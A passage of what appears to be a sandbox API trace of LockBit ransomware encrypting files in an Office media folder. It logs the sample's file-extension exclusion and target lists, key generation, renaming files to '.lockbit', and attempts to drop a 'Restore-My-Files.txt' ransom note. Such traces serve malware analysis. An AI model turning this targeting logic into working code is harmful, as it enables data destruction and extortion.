Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.573] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14984_.GIF") returned=".GIF" [0203.573] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.573] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.573] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.573] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.573] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.573] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.573] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.573] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.573] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.573] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.573] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.574] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.574] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.574] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.574] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.574] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.574] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.574] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.574] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.574] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.574] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.574] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.574] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.574] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.574] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.574] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.574] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.574] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.574] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14984_.GIF.lockbit") returned 78 [0203.574] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14984_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14984_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.576] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.576] malloc (_Size=0x40068) returned 0x3df0008 [0203.576] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=182) returned 1 [0203.576] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.576] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.576] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.577] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.577] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.580] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14984_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14984_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.580] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.580] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.580] free (_Block=0x1fa2ed8) [0203.580] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14984_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.580] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.580] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.580] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1da0000, ftCreationTime.dwHighDateTime=0x1bd4f41, ftLastAccessTime.dwLowDateTime=0xbca5cca0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc1da0000, ftLastWriteTime.dwHighDateTime=0x1bd4f41, nFileSizeHigh=0x0, nFileSizeLow=0x40, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14985_.GIF", cAlternateFileName="")) returned 1 [0203.580] lstrcmpiW (lpString1=".", lpString2="BD14985_.GIF") returned -1 [0203.580] lstrcmpiW (lpString1="..", lpString2="BD14985_.GIF") returned -1 [0203.580] PathFindExtensionW (pszPath="BD14985_.GIF") returned=".GIF" [0203.580] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.580] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.580] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.580] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.580] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.580] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.580] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.580] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.581] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.581] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.581] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.581] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.581] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.581] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.581] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.581] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.581] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.581] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.581] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.581] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.581] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.581] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.581] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.581] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.581] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.581] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.581] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.581] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.581] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.581] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.581] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.581] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.581] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.581] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.581] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.581] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.581] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.581] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.581] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.581] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.581] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.581] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.581] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.581] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.581] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.582] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.582] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.582] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14985_.GIF") returned 1 [0203.582] lstrcmpiW (lpString1="ntldr", lpString2="BD14985_.GIF") returned 1 [0203.582] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14985_.GIF") returned 1 [0203.582] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14985_.GIF") returned 1 [0203.582] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14985_.GIF") returned -1 [0203.582] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14985_.GIF") returned 1 [0203.582] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14985_.GIF") returned 1 [0203.582] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.582] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14985_.GIF") returned=".GIF" [0203.582] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.582] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.582] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.582] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.582] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.582] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.582] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.582] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.582] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.582] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.582] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.582] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.582] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.582] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.582] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.582] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.582] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.582] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.582] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.582] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.582] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.582] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.582] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.582] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.582] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.583] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.583] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.583] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.583] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14985_.GIF.lockbit") returned 78 [0203.583] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14985_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14985_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.584] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.584] malloc (_Size=0x40068) returned 0x3df0008 [0203.584] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=64) returned 1 [0203.584] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.584] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.584] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.585] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.585] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.585] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.585] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.588] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14985_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14985_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.588] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.588] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.588] free (_Block=0x1fa2ed8) [0203.588] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14985_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.588] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.588] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.588] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57254000, ftCreationTime.dwHighDateTime=0x1bd5ec1, ftLastAccessTime.dwLowDateTime=0xbca5cca0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x57254000, ftLastWriteTime.dwHighDateTime=0x1bd5ec1, nFileSizeHigh=0x0, nFileSizeLow=0x40f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15018_.GIF", cAlternateFileName="")) returned 1 [0203.588] lstrcmpiW (lpString1=".", lpString2="BD15018_.GIF") returned -1 [0203.588] lstrcmpiW (lpString1="..", lpString2="BD15018_.GIF") returned -1 [0203.588] PathFindExtensionW (pszPath="BD15018_.GIF") returned=".GIF" [0203.588] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.588] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.588] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.588] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.588] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.589] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.589] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.589] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.589] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.589] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.589] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.589] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.589] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.589] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.589] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.589] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.589] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.589] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.589] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.589] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.589] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.589] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.589] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.589] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.589] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.589] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.589] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.589] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.589] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.589] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.589] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.589] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.589] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.589] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.589] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.589] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.589] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.589] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.589] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.589] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.589] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.590] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.590] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.590] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.590] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.590] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.590] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.590] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15018_.GIF") returned 1 [0203.590] lstrcmpiW (lpString1="ntldr", lpString2="BD15018_.GIF") returned 1 [0203.590] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15018_.GIF") returned 1 [0203.590] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15018_.GIF") returned 1 [0203.590] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15018_.GIF") returned -1 [0203.590] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15018_.GIF") returned 1 [0203.590] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15018_.GIF") returned 1 [0203.590] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.590] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15018_.GIF") returned=".GIF" [0203.590] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.590] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.590] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.590] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.590] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.590] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.590] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.590] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.590] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.590] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.590] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.590] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.590] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.590] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.590] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.590] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.590] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.590] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.590] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.590] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.590] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.590] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.591] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.591] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.591] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.591] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.591] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.591] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.591] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15018_.GIF.lockbit") returned 78 [0203.591] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15018_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15018_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.593] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.593] malloc (_Size=0x40068) returned 0x3df0008 [0203.593] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=16630) returned 1 [0203.593] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.593] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.593] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.593] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.593] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.807] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15018_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15018_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.807] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.807] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0x0 [0203.830] free (_Block=0x1fa2ed8) [0203.830] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15018_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.830] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.830] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.830] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bb99900, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbca82e00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7bb99900, ftLastWriteTime.dwHighDateTime=0x1bd8f92, 